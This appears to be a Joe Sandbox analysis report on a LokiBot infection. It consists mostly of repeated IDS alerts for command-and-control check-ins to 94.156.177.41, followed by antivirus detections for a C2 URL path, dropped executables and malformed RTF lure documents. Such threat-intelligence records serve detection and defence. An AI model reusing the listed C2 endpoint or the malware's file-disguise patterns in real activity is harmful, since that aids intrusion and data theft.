2024-11-20T10:13:17.903807+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49276	94.156.177.41	80	TCP
2024-11-20T10:13:18.831570+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49277	94.156.177.41	80	TCP
2024-11-20T10:13:19.881369+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49278	94.156.177.41	80	TCP
2024-11-20T10:13:20.786261+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49279	94.156.177.41	80	TCP
2024-11-20T10:13:21.865363+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49280	94.156.177.41	80	TCP

ET MALWARE LokiBot User-Agent (Charon/Inferno)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-20T10:11:34.232361+0100	2021641	1	A Network Trojan was detected	192.168.2.22	49171	94.156.177.41	80	TCP
2024-11-20T10:11:34.936986+0100	2021641	1	A Network Trojan was detected	192.168.2.22	49172	94.156.177.41	80	TCP
2024-11-20T10:11:35.753276+0100	2021641	1	A Network Trojan was detected	192.168.2.22	49173	94.156.177.41	80	TCP
2024-11-20T10:11:36.788420+0100	2021641	1	A Network Trojan was detected	192.168.2.22	49174	94.156.177.41	80	TCP
2024-11-20T10:11:37.865230+0100	2021641	1	A Network Trojan was detected	192.168.2.22	49175	94.156.177.41	80	TCP
2024-11-20T10:11:39.935431+0100	2021641	1	A Network Trojan was detected	192.168.2.22	49176	94.156.177.41	80	TCP
2024-11-20T10:11:40.804853+0100	2021641	1	A Network Trojan was detected	192.168.2.22	49177	94.156.177.41	80	TCP
2024-11-20T10:11:41.692875+0100	2021641	1	A Network Trojan was detected	192.168.2.22	49178	94.156.177.41	80	TCP
2024-11-20T10:11:42.598311+0100	2021641	1	A Network Trojan was detected	192.168.2.22	49179	94.156.177.41	80	TCP
2024-11-20T10:11:43.508451+0100	2021641	1	A Network Trojan was detected	192.168.2.22	49180	94.156.177.41	80	TCP
2024-11-20T10:11:44.410226+0100	2021641	1	A Network Trojan was detected	192.168.2.22	49181	94.156.177.41	80	TCP
2024-11-20T10:11:46.066976+0100	2021641	1	A Network Trojan was detected	192.168.2.22	49182	94.156.177.41	80	TCP
2024-11-20T10:11:47.094306+0100	2021641	1	A Network Trojan was detected	192.168.2.22	49183	94.156.177.41	80	TCP
2024-11-20T10:11:48.001931+0100	2021641	1	A Network Trojan was detected	192.168.2.22	49184	94.156.177.41	80	TCP
2024-11-20T10:11:48.916450+0100	2021641	1	A Network Trojan was detected	192.168.2.22	49185	94.156.177.41	80	TCP
2024-11-20T10:11:49.934221+0100	2021641	1	A Network Trojan was detected	192.168.2.22	49186	94.156.177.41	80	TCP
2024-11-20T10:11:50.825355+0100	2021641	1	A Network Trojan was detected	192.168.2.22	49187	94.156.177.41	80	TCP
2024-11-20T10:11:51.974265+0100	2021641	1	A Network Trojan was detected	192.168.2.22	49188	94.156.177.41	80	TCP
2024-11-20T10:11:52.833476+0100	2021641	1	A Network Trojan was detected	192.168.2.22	49189	94.156.177.41	80	TCP
2024-11-20T10:11:53.743942+0100	2021641	1	A Network Trojan was detected	192.168.2.22	49190	94.156.177.41	80	TCP
2024-11-20T10:11:54.665755+0100	2021641	1	A Network Trojan was detected	192.168.2.22	49191	94.156.177.41	80	TCP
2024-11-20T10:11:55.543705+0100	2021641	1	A Network Trojan was detected	192.168.2.22	49192	94.156.177.41	80	TCP
2024-11-20T10:11:56.465409+0100	2021641	1	A Network Trojan was detected	192.168.2.22	49193	94.156.177.41	80	TCP
2024-11-20T10:11:57.354850+0100	2021641	1	A Network Trojan was detected	192.168.2.22	49194	94.156.177.41	80	TCP
2024-11-20T10:11:58.251851+0100	2021641	1	A Network Trojan was detected	192.168.2.22	49195	94.156.177.41	80	TCP
2024-11-20T10:11:59.153133+0100	2021641	1	A Network Trojan was detected	192.168.2.22	49196	94.156.177.41	80	TCP
2024-11-20T10:12:00.062553+0100	2021641	1	A Network Trojan was detected	192.168.2.22	49197	94.156.177.41	80	TCP
2024-11-20T10:12:01.086240+0100	2021641	1	A Network Trojan was detected	192.168.2.22	49198	94.156.177.41	80	TCP
2024-11-20T10:12:02.135572+0100	2021641	1	A Network Trojan was detected	192.168.2.22	49199	94.156.177.41	80	TCP
2024-11-20T10:12:03.154171+0100	2021641	1	A Network Trojan was detected	192.168.2.22	49200	94.156.177.41	80	TCP
2024-11-20T10:12:04.183469+0100	2021641	1	A Network Trojan was detected	192.168.2.22	49201	94.156.177.41	80	TCP
2024-11-20T10:12:05.221730+0100	2021641	1	A Network Trojan was detected	192.168.2.22	49202	94.156.177.41	80	TCP
2024-11-20T10:12:06.101870+0100	2021641	1	A Network Trojan was detected	192.168.2.22	49203	94.156.177.41	80	TCP
2024-11-20T10:12:06.992362+0100	2021641	1	A Network Trojan was detected	192.168.2.22	49204	94.156.177.41	80	TCP
2024-11-20T10:12:07.878233+0100	2021641	1	A Network Trojan was detected	192.168.2.22	49205	94.156.177.41	80	TCP
2024-11-20T10:12:08.762365+0100	2021641	1	A Network Trojan was detected	192.168.2.22	49206	94.156.177.41	80	TCP
2024-11-20T10:12:09.636983+0100	2021641	1	A Network Trojan was detected	192.168.2.22	49207	94.156.177.41	80	TCP
2024-11-20T10:12:10.655009+0100	2021641	1	A Network Trojan was detected	192.168.2.22	49208	94.156.177.41	80	TCP
2024-11-20T10:12:11.548573+0100	2021641	1	A Network Trojan was detected	192.168.2.22	49209	94.156.177.41	80	TCP
2024-11-20T10:12:12.583479+0100	2021641	1	A Network Trojan was detected	192.168.2.22	49210	94.156.177.41	80	TCP
2024-11-20T10:12:13.635352+0100	2021641	1	A Network Trojan was detected	192.168.2.22	49211	94.156.177.41	80	TCP
2024-11-20T10:12:14.668490+0100	2021641	1	A Network Trojan was detected	192.168.2.22	49212	94.156.177.41	80	TCP
2024-11-20T10:12:15.692786+0100	2021641	1	A Network Trojan was detected	192.168.2.22	49213	94.156.177.41	80	TCP
2024-11-20T10:12:16.709953+0100	2021641	1	A Network Trojan was detected	192.168.2.22	49214	94.156.177.41	80	TCP
2024-11-20T10:12:17.740346+0100	2021641	1	A Network Trojan was detected	192.168.2.22	49215	94.156.177.41	80	TCP
2024-11-20T10:12:19.475029+0100	2021641	1	A Network Trojan was detected	192.168.2.22	49216	94.156.177.41	80	TCP
2024-11-20T10:12:20.388739+0100	2021641	1	A Network Trojan was detected	192.168.2.22	49217	94.156.177.41	80	TCP
2024-11-20T10:12:21.265845+0100	2021641	1	A Network Trojan was detected	192.168.2.22	49218	94.156.177.41	80	TCP
2024-11-20T10:12:22.394589+0100	2021641	1	A Network Trojan was detected	192.168.2.22	49219	94.156.177.41	80	TCP
2024-11-20T10:12:23.419939+0100	2021641	1	A Network Trojan was detected	192.168.2.22	49220	94.156.177.41	80	TCP
2024-11-20T10:12:24.307414+0100	2021641	1	A Network Trojan was detected	192.168.2.22	49221	94.156.177.41	80	TCP
2024-11-20T10:12:25.356968+0100	2021641	1	A Network Trojan was detected	192.168.2.22	49222	94.156.177.41	80	TCP
2024-11-20T10:12:26.273860+0100	2021641	1	A Network Trojan was detected	192.168.2.22	49223	94.156.177.41	80	TCP
2024-11-20T10:12:27.165072+0100	2021641	1	A Network Trojan was detected	192.168.2.22	49224	94.156.177.41	80	TCP
2024-11-20T10:12:28.110543+0100	2021641	1	A Network Trojan was detected	192.168.2.22	49225	94.156.177.41	80	TCP
2024-11-20T10:12:28.999728+0100	2021641	1	A Network Trojan was detected	192.168.2.22	49226	94.156.177.41	80	TCP
2024-11-20T10:12:29.966426+0100	2021641	1	A Network Trojan was detected	192.168.2.22	49227	94.156.177.41	80	TCP
2024-11-20T10:12:30.982470+0100	2021641	1	A Network Trojan was detected	192.168.2.22	49228	94.156.177.41	80	TCP
2024-11-20T10:12:32.023731+0100	2021641	1	A Network Trojan was detected	192.168.2.22	49229	94.156.177.41	80	TCP
2024-11-20T10:12:32.972572+0100	2021641	1	A Network Trojan was detected	192.168.2.22	49230	94.156.177.41	80	TCP
2024-11-20T10:12:33.892076+0100	2021641	1	A Network Trojan was detected	192.168.2.22	49231	94.156.177.41	80	TCP
2024-11-20T10:12:34.777104+0100	2021641	1	A Network Trojan was detected	192.168.2.22	49232	94.156.177.41	80	TCP
2024-11-20T10:12:35.645216+0100	2021641	1	A Network Trojan was detected	192.168.2.22	49233	94.156.177.41	80	TCP
2024-11-20T10:12:36.520686+0100	2021641	1	A Network Trojan was detected	192.168.2.22	49234	94.156.177.41	80	TCP
2024-11-20T10:12:37.391332+0100	2021641	1	A Network Trojan was detected	192.168.2.22	49235	94.156.177.41	80	TCP
2024-11-20T10:12:38.295670+0100	2021641	1	A Network Trojan was detected	192.168.2.22	49236	94.156.177.41	80	TCP
2024-11-20T10:12:39.189869+0100	2021641	1	A Network Trojan was detected	192.168.2.22	49237	94.156.177.41	80	TCP
2024-11-20T10:12:40.238221+0100	2021641	1	A Network Trojan was detected	192.168.2.22	49238	94.156.177.41	80	TCP
2024-11-20T10:12:41.149834+0100	2021641	1	A Network Trojan was detected	192.168.2.22	49239	94.156.177.41	80	TCP
2024-11-20T10:12:42.075089+0100	2021641	1	A Network Trojan was detected	192.168.2.22	49240	94.156.177.41	80	TCP
2024-11-20T10:12:43.090775+0100	2021641	1	A Network Trojan was detected	192.168.2.22	49241	94.156.177.41	80	TCP
2024-11-20T10:12:44.335023+0100	2021641	1	A Network Trojan was detected	192.168.2.22	49242	94.156.177.41	80	TCP
2024-11-20T10:12:45.306056+0100	2021641	1	A Network Trojan was detected	192.168.2.22	49243	94.156.177.41	80	TCP
2024-11-20T10:12:46.228751+0100	2021641	1	A Network Trojan was detected	192.168.2.22	49244	94.156.177.41	80	TCP
2024-11-20T10:12:47.301018+0100	2021641	1	A Network Trojan was detected	192.168.2.22	49245	94.156.177.41	80	TCP
2024-11-20T10:12:48.198489+0100	2021641	1	A Network Trojan was detected	192.168.2.22	49246	94.156.177.41	80	TCP
2024-11-20T10:12:49.104815+0100	2021641	1	A Network Trojan was detected	192.168.2.22	49247	94.156.177.41	80	TCP
2024-11-20T10:12:50.259999+0100	2021641	1	A Network Trojan was detected	192.168.2.22	49248	94.156.177.41	80	TCP
2024-11-20T10:12:51.135098+0100	2021641	1	A Network Trojan was detected	192.168.2.22	49249	94.156.177.41	80	TCP
2024-11-20T10:12:52.064243+0100	2021641	1	A Network Trojan was detected	192.168.2.22	49250	94.156.177.41	80	TCP
2024-11-20T10:12:53.190103+0100	2021641	1	A Network Trojan was detected	192.168.2.22	49251	94.156.177.41	80	TCP
2024-11-20T10:12:54.198386+0100	2021641	1	A Network Trojan was detected	192.168.2.22	49252	94.156.177.41	80	TCP
2024-11-20T10:12:55.205372+0100	2021641	1	A Network Trojan was detected	192.168.2.22	49253	94.156.177.41	80	TCP
2024-11-20T10:12:56.120814+0100	2021641	1	A Network Trojan was detected	192.168.2.22	49254	94.156.177.41	80	TCP
2024-11-20T10:12:57.001731+0100	2021641	1	A Network Trojan was detected	192.168.2.22	49255	94.156.177.41	80	TCP
2024-11-20T10:12:57.910682+0100	2021641	1	A Network Trojan was detected	192.168.2.22	49256	94.156.177.41	80	TCP
2024-11-20T10:12:58.994068+0100	2021641	1	A Network Trojan was detected	192.168.2.22	49257	94.156.177.41	80	TCP
2024-11-20T10:12:59.856695+0100	2021641	1	A Network Trojan was detected	192.168.2.22	49258	94.156.177.41	80	TCP
2024-11-20T10:13:00.859620+0100	2021641	1	A Network Trojan was detected	192.168.2.22	49259	94.156.177.41	80	TCP
2024-11-20T10:13:01.807106+0100	2021641	1	A Network Trojan was detected	192.168.2.22	49260	94.156.177.41	80	TCP
2024-11-20T10:13:02.864990+0100	2021641	1	A Network Trojan was detected	192.168.2.22	49261	94.156.177.41	80	TCP
2024-11-20T10:13:03.882271+0100	2021641	1	A Network Trojan was detected	192.168.2.22	49262	94.156.177.41	80	TCP
2024-11-20T10:13:04.788703+0100	2021641	1	A Network Trojan was detected	192.168.2.22	49263	94.156.177.41	80	TCP
2024-11-20T10:13:05.710359+0100	2021641	1	A Network Trojan was detected	192.168.2.22	49264	94.156.177.41	80	TCP
2024-11-20T10:13:06.715979+0100	2021641	1	A Network Trojan was detected	192.168.2.22	49265	94.156.177.41	80	TCP
2024-11-20T10:13:07.728341+0100	2021641	1	A Network Trojan was detected	192.168.2.22	49266	94.156.177.41	80	TCP
2024-11-20T10:13:08.595686+0100	2021641	1	A Network Trojan was detected	192.168.2.22	49267	94.156.177.41	80	TCP
2024-11-20T10:13:09.484579+0100	2021641	1	A Network Trojan was detected	192.168.2.22	49268	94.156.177.41	80	TCP
2024-11-20T10:13:10.364041+0100	2021641	1	A Network Trojan was detected	192.168.2.22	49269	94.156.177.41	80	TCP
2024-11-20T10:13:11.382963+0100	2021641	1	A Network Trojan was detected	192.168.2.22	49270	94.156.177.41	80	TCP
2024-11-20T10:13:12.272453+0100	2021641	1	A Network Trojan was detected	192.168.2.22	49271	94.156.177.41	80	TCP
2024-11-20T10:13:13.292586+0100	2021641	1	A Network Trojan was detected	192.168.2.22	49272	94.156.177.41	80	TCP
2024-11-20T10:13:14.191871+0100	2021641	1	A Network Trojan was detected	192.168.2.22	49273	94.156.177.41	80	TCP
2024-11-20T10:13:15.065941+0100	2021641	1	A Network Trojan was detected	192.168.2.22	49274	94.156.177.41	80	TCP
2024-11-20T10:13:16.079240+0100	2021641	1	A Network Trojan was detected	192.168.2.22	49275	94.156.177.41	80	TCP
2024-11-20T10:13:17.017320+0100	2021641	1	A Network Trojan was detected	192.168.2.22	49276	94.156.177.41	80	TCP
2024-11-20T10:13:18.056702+0100	2021641	1	A Network Trojan was detected	192.168.2.22	49277	94.156.177.41	80	TCP
2024-11-20T10:13:18.985728+0100	2021641	1	A Network Trojan was detected	192.168.2.22	49278	94.156.177.41	80	TCP
2024-11-20T10:13:20.030600+0100	2021641	1	A Network Trojan was detected	192.168.2.22	49279	94.156.177.41	80	TCP
2024-11-20T10:13:21.135705+0100	2021641	1	A Network Trojan was detected	192.168.2.22	49280	94.156.177.41	80	TCP

ETPRO MALWARE LokiBot Checkin M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-20T10:11:34.232361+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49171	94.156.177.41	80	TCP
2024-11-20T10:11:34.936986+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49172	94.156.177.41	80	TCP
2024-11-20T10:11:35.753276+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49173	94.156.177.41	80	TCP
2024-11-20T10:11:36.788420+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49174	94.156.177.41	80	TCP
2024-11-20T10:11:37.865230+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49175	94.156.177.41	80	TCP
2024-11-20T10:11:39.935431+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49176	94.156.177.41	80	TCP
2024-11-20T10:11:40.804853+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49177	94.156.177.41	80	TCP
2024-11-20T10:11:41.692875+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49178	94.156.177.41	80	TCP
2024-11-20T10:11:42.598311+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49179	94.156.177.41	80	TCP
2024-11-20T10:11:43.508451+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49180	94.156.177.41	80	TCP
2024-11-20T10:11:44.410226+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49181	94.156.177.41	80	TCP
2024-11-20T10:11:46.066976+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49182	94.156.177.41	80	TCP
2024-11-20T10:11:47.094306+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49183	94.156.177.41	80	TCP
2024-11-20T10:11:48.001931+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49184	94.156.177.41	80	TCP
2024-11-20T10:11:48.916450+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49185	94.156.177.41	80	TCP
2024-11-20T10:11:49.934221+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49186	94.156.177.41	80	TCP
2024-11-20T10:11:50.825355+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49187	94.156.177.41	80	TCP
2024-11-20T10:11:51.974265+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49188	94.156.177.41	80	TCP
2024-11-20T10:11:52.833476+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49189	94.156.177.41	80	TCP
2024-11-20T10:11:53.743942+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49190	94.156.177.41	80	TCP
2024-11-20T10:11:54.665755+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49191	94.156.177.41	80	TCP
2024-11-20T10:11:55.543705+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49192	94.156.177.41	80	TCP
2024-11-20T10:11:56.465409+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49193	94.156.177.41	80	TCP
2024-11-20T10:11:57.354850+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49194	94.156.177.41	80	TCP
2024-11-20T10:11:58.251851+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49195	94.156.177.41	80	TCP
2024-11-20T10:11:59.153133+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49196	94.156.177.41	80	TCP
2024-11-20T10:12:00.062553+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49197	94.156.177.41	80	TCP
2024-11-20T10:12:01.086240+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49198	94.156.177.41	80	TCP
2024-11-20T10:12:02.135572+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49199	94.156.177.41	80	TCP
2024-11-20T10:12:03.154171+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49200	94.156.177.41	80	TCP
2024-11-20T10:12:04.183469+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49201	94.156.177.41	80	TCP
2024-11-20T10:12:05.221730+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49202	94.156.177.41	80	TCP
2024-11-20T10:12:06.101870+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49203	94.156.177.41	80	TCP
2024-11-20T10:12:06.992362+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49204	94.156.177.41	80	TCP
2024-11-20T10:12:07.878233+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49205	94.156.177.41	80	TCP
2024-11-20T10:12:08.762365+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49206	94.156.177.41	80	TCP
2024-11-20T10:12:09.636983+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49207	94.156.177.41	80	TCP
2024-11-20T10:12:10.655009+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49208	94.156.177.41	80	TCP
2024-11-20T10:12:11.548573+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49209	94.156.177.41	80	TCP
2024-11-20T10:12:12.583479+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49210	94.156.177.41	80	TCP
2024-11-20T10:12:13.635352+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49211	94.156.177.41	80	TCP
2024-11-20T10:12:14.668490+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49212	94.156.177.41	80	TCP
2024-11-20T10:12:15.692786+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49213	94.156.177.41	80	TCP
2024-11-20T10:12:16.709953+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49214	94.156.177.41	80	TCP
2024-11-20T10:12:17.740346+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49215	94.156.177.41	80	TCP
2024-11-20T10:12:19.475029+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49216	94.156.177.41	80	TCP
2024-11-20T10:12:20.388739+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49217	94.156.177.41	80	TCP
2024-11-20T10:12:21.265845+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49218	94.156.177.41	80	TCP
2024-11-20T10:12:22.394589+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49219	94.156.177.41	80	TCP
2024-11-20T10:12:23.419939+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49220	94.156.177.41	80	TCP
2024-11-20T10:12:24.307414+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49221	94.156.177.41	80	TCP
2024-11-20T10:12:25.356968+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49222	94.156.177.41	80	TCP
2024-11-20T10:12:26.273860+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49223	94.156.177.41	80	TCP
2024-11-20T10:12:27.165072+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49224	94.156.177.41	80	TCP
2024-11-20T10:12:28.110543+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49225	94.156.177.41	80	TCP
2024-11-20T10:12:28.999728+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49226	94.156.177.41	80	TCP
2024-11-20T10:12:29.966426+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49227	94.156.177.41	80	TCP
2024-11-20T10:12:30.982470+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49228	94.156.177.41	80	TCP
2024-11-20T10:12:32.023731+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49229	94.156.177.41	80	TCP
2024-11-20T10:12:32.972572+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49230	94.156.177.41	80	TCP
2024-11-20T10:12:33.892076+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49231	94.156.177.41	80	TCP
2024-11-20T10:12:34.777104+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49232	94.156.177.41	80	TCP
2024-11-20T10:12:35.645216+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49233	94.156.177.41	80	TCP
2024-11-20T10:12:36.520686+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49234	94.156.177.41	80	TCP
2024-11-20T10:12:37.391332+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49235	94.156.177.41	80	TCP
2024-11-20T10:12:38.295670+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49236	94.156.177.41	80	TCP
2024-11-20T10:12:39.189869+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49237	94.156.177.41	80	TCP
2024-11-20T10:12:40.238221+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49238	94.156.177.41	80	TCP
2024-11-20T10:12:41.149834+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49239	94.156.177.41	80	TCP
2024-11-20T10:12:42.075089+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49240	94.156.177.41	80	TCP
2024-11-20T10:12:43.090775+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49241	94.156.177.41	80	TCP
2024-11-20T10:12:44.335023+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49242	94.156.177.41	80	TCP
2024-11-20T10:12:45.306056+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49243	94.156.177.41	80	TCP
2024-11-20T10:12:46.228751+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49244	94.156.177.41	80	TCP
2024-11-20T10:12:47.301018+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49245	94.156.177.41	80	TCP
2024-11-20T10:12:48.198489+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49246	94.156.177.41	80	TCP
2024-11-20T10:12:49.104815+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49247	94.156.177.41	80	TCP
2024-11-20T10:12:50.259999+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49248	94.156.177.41	80	TCP
2024-11-20T10:12:51.135098+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49249	94.156.177.41	80	TCP
2024-11-20T10:12:52.064243+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49250	94.156.177.41	80	TCP
2024-11-20T10:12:53.190103+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49251	94.156.177.41	80	TCP
2024-11-20T10:12:54.198386+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49252	94.156.177.41	80	TCP
2024-11-20T10:12:55.205372+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49253	94.156.177.41	80	TCP
2024-11-20T10:12:56.120814+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49254	94.156.177.41	80	TCP
2024-11-20T10:12:57.001731+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49255	94.156.177.41	80	TCP
2024-11-20T10:12:57.910682+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49256	94.156.177.41	80	TCP
2024-11-20T10:12:58.994068+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49257	94.156.177.41	80	TCP
2024-11-20T10:12:59.856695+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49258	94.156.177.41	80	TCP
2024-11-20T10:13:00.859620+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49259	94.156.177.41	80	TCP
2024-11-20T10:13:01.807106+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49260	94.156.177.41	80	TCP
2024-11-20T10:13:02.864990+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49261	94.156.177.41	80	TCP
2024-11-20T10:13:03.882271+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49262	94.156.177.41	80	TCP
2024-11-20T10:13:04.788703+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49263	94.156.177.41	80	TCP
2024-11-20T10:13:05.710359+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49264	94.156.177.41	80	TCP
2024-11-20T10:13:06.715979+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49265	94.156.177.41	80	TCP
2024-11-20T10:13:07.728341+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49266	94.156.177.41	80	TCP
2024-11-20T10:13:08.595686+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49267	94.156.177.41	80	TCP
2024-11-20T10:13:09.484579+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49268	94.156.177.41	80	TCP
2024-11-20T10:13:10.364041+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49269	94.156.177.41	80	TCP
2024-11-20T10:13:11.382963+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49270	94.156.177.41	80	TCP
2024-11-20T10:13:12.272453+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49271	94.156.177.41	80	TCP
2024-11-20T10:13:13.292586+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49272	94.156.177.41	80	TCP
2024-11-20T10:13:14.191871+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49273	94.156.177.41	80	TCP
2024-11-20T10:13:15.065941+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49274	94.156.177.41	80	TCP
2024-11-20T10:13:16.079240+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49275	94.156.177.41	80	TCP
2024-11-20T10:13:17.017320+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49276	94.156.177.41	80	TCP
2024-11-20T10:13:18.056702+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49277	94.156.177.41	80	TCP
2024-11-20T10:13:18.985728+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49278	94.156.177.41	80	TCP
2024-11-20T10:13:20.030600+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49279	94.156.177.41	80	TCP
2024-11-20T10:13:21.135705+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49280	94.156.177.41	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://94.156.177.41/maxzi/five/fre.php	Avira URL Cloud: Label: malware
Source: 94.156.177.41/maxzi/five/fre.php	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Roaming\wininit.exe	Avira: detection malicious, Label: HEUR/AGEN.1306899
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\caspol[1].exe	Avira: detection malicious, Label: HEUR/AGEN.1306899
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\18F2865F.doc	Avira: detection malicious, Label: HEUR/Rtf.Malformed
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\seemybestoptionforentiretimegivenmebackwith______suchagreatthignswithentiretimewithmegood______seethebestthignsalwaysgivnebestthigns[1].doc	Avira: detection malicious, Label: HEUR/Rtf.Malformed

Found malware configuration

Source: 00000010.00000002.422492450.00000000020E1000.00000004.00000800.00020000.00000000.sdmp

